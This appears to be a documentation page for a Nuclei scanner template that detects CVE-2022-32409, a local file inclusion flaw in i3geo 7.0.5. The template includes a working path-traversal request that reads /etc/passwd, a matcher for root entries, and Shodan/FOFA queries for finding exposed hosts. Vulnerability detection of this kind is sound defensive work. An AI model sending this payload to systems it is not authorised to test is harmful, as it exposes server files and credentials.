Skip to content
Nuclei Templates

Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion

ID: CVE-2022-32409

Severity: critical

Author: pikpikcu

Tags: cve2022,cve,i3geo,lfi,softwarepublico

Description

Section titled “Description”

Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.

YAML Source

Section titled “YAML Source”
id: CVE-2022-32409


info:
  name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion
  author: pikpikcu
  severity: critical
  description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability.
  reference:
    - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt
    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32409
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-32409
    cwe-id: CWE-22
    epss-score: 0.47251
    epss-percentile: 0.97452
    cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: softwarepublico
    product: i3geo
    shodan-query: http.html:"i3geo"
    fofa-query: body="i3geo"
  tags: cve2022,cve,i3geo,lfi,softwarepublico


http:
  - method: GET
    path:
      - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a0046304402201de4c9a6511199f1d47e313b71a5ff05d9696f791f3f762b97cfe8d87b789e0402205e2d6d5fd8f91ef13ff1a3e6f855b32bc715ec95cde043505537c04a62e067bf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-32409.yaml"

View on Github